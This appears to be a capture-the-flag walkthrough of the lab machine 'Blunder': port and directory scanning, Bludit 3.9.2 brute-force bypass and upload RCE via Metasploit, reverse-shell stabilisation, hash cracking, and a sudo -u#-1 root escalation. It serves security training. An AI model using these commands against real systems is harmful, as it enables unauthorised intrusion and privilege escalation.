Scanning
Nmap
ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.191 | grep open | awk -F / '{print $1}' ORS=',') echo $ports && nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.191
1
2
3
4
5
6
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Gobuster
gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,php -t 50
1
2
/admin (Status: 301)
/todo.txt (Status: 200)
/admin
- in the admin page I found bludit CMS admin login panel,
- Looking at the source code, the CMS version is identified as
3.9.2
/todo.txt
-Inform fergus that the new blog needs images - PENDING
potential username fergus
search : bludit 3.9.2 vulnerability
2 CVEs Found
CVE-2019-17240:bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.
CVE-2019-16113 (1 Metasploit modules):Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.
User Exploiting
CVE-2019-17240
Discovered By: Rastating References: rastating.github.io Blog post.
requirements
- username: fergus
wordlist: create a wordlist from the website text
1
cewl http://10.10.10.191 -w wordlist
POC Script
- Wordlist generated from webpage usubg cewl tool
ippsec video
creds
1
fergus:RolandDeschain
CVE-2019-16113
Discoverer: Christasa References: issue 1081
requirements
- username: fergus
- password: RolandDeschain
Exploiting
using ExploitDB Script
- Title: Bludit 3.9.2 - Directory Traversal
- Author: James Green
- EDB-ID: 48701
Bludit_3.9.2-DirectoryTraversal.py
ippsec video
MSF Module Rapid7
exploit/linux/http/bludit_upload_images_exec
1
2
3
4
BLUDITPASS => RolandDeschain
BLUDITUSER => fergus
RHOSTS => 10.10.10.191
LHOST => tun0
low lavel user shell or meterpreter shell
1
2
3
$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
spawn dumb shell, ropnop.com blog
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ which python
/usr/bin/python
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg //Enter twice
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
for meterpreter shell upgrade : hackingarticles.in blog
Local Enumeration
Home directory has 2 users
1 2
hugo //has user flag shaun
in
/var/www/bludit-3.10.0a/bl-content/databases
directory1 2 3 4 5
user.php //contains Hugo's password hash "nickname": "Hugo", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d" //hash type SHA1
creds
1
hugo:Password120
Root Prevesc
Enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
$ su - hugo su - hugo Password: Password120 hugo@blunder:~$ sudo -l sudo -l Password: Password120 Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash hugo@blunder:~$ sudo -V sudo -V Sudo version 1.8.25p1
search : sudo ALL, !root privesc
1 CVE Found
CVE-2019-14287
1
2
3
4
5
# Exploit Title : sudo 1.8.27 - Security Bypass
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.2.28
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
EDB-ID: 47502
misconfigured sudo
1 2 3
$ sudo -l User hugo may run the following commands on blunder: (ALL, !root) /bin/bash
EXPLOIT :
1
$ sudo -u#-1 /bin/bash